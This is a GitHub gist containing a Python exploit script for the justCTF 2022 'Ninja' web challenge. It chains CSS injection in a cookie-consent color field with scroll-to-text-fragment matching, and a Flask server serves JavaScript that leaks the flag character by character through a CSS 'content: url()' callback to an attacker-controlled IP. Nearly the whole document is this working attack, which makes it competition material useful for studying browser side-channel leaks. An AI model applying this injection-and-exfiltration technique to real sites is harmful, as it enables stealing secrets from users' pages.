Skip to content

Instantly share code, notes, and snippets.

@haqpl

haqpl/sploit.py Secret

Created Jun 12, 2022
Embed
What would you like to do?
justCTF22 - Ninja
from flask import Flask
from flask import request
import string
import requests
from bs4 import BeautifulSoup
URL = "http://ninja.web.jctf.pro"
RECEIVER = "http://51.38.138.162:1338"
proxy = {}
all_chars = string.ascii_lowercase + '_' + '}'
s = requests.Session()
won = False
i = 0
flag = "justCTF{"
def retrive_csrf(page):
resp = s.get(f"{URL}/{page}", proxies=proxy).text
return BeautifulSoup(resp, "html.parser").find_all('input')[0].attrs.get('value')
def register(username, password):
resp = s.get(f"{URL}/register", proxies=proxy).text
csrf_token = retrive_csrf("register")
burp0_data = {"csrf_token": csrf_token, "username": username, "password": password, "submit": "Register"}
s.post(f"{URL}/register", data=burp0_data, proxies=proxy)
return
def login(username, password):
csrf_token = retrive_csrf("login")
burp0_data = {"csrf_token": csrf_token, "username": username, "password": password, "submit": "Sign In"}
s.post(f"{URL}/login", data=burp0_data, proxies=proxy)
return
def consent(title, css_payload, link):
csrf_token = retrive_csrf("consents")
burp0_data = {"csrf_token": csrf_token, "title": title, "color_palette": css_payload, "link": link, "submit": "Generate cookie consent"}
resp = s.post(f"{URL}/consents", data=burp0_data, proxies=proxy).text
return BeautifulSoup(resp, "html.parser").find('a',text=title)['href'].split('/')[2].split('?')[0]
def setup():
global note_id
user, pwd = 'haqpl', 'haqpl'
register(user, pwd)
login(user, pwd)
# CSS style applied to the matched STTF with ping back to us
css_payload = f"#FFFFFF;}} :target::before {{ content : url({RECEIVER}/hit)"
# Ninja Cookie gadget on which bot will click after visit, triggering STTF
sttf = ':~:text=Hello" class="lg-cc lg-cc__button_type_clear'
note_id = consent('win', css_payload, sttf)
setup()
app = Flask(__name__)
def gen_redirect(c):
global flag, note_id, i
print("Current char: ", all_chars[i-1])
"""
#:~:text=[prefix-,]textStart[,textEnd][,-suffix]
context |-------match-----| context
"""
payload = f"""
<script>
const c = "{c}";
var flag = "{flag}";
const sleep = d => new Promise(r=>setTimeout(r,d));
window.onload = async () => {{
//try to match subsequent flag characters
payload = `:~:text=${{flag}}-,${{c}}" class="lg-cc lg-cc__button_type_clear"`;
myk = window.open('{URL}/consent/{note_id}?link='+encodeURIComponent(payload));
myk.focus();
await sleep(100);
myk.close();
location="/";
}}
</script>
"""
return payload
@app.route('/')
def redirect():
global i, won
i+=1
return gen_redirect(all_chars[i-1]) if (not won and len(all_chars)>i-1) else "Thank you for cooperation"
@app.route('/hit')
def receiver():
global i, flag, won
leaked = all_chars[i-1]
flag+=leaked
i=0
print("Current flag:", flag)
if leaked == "}":
won = True
return "ok"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment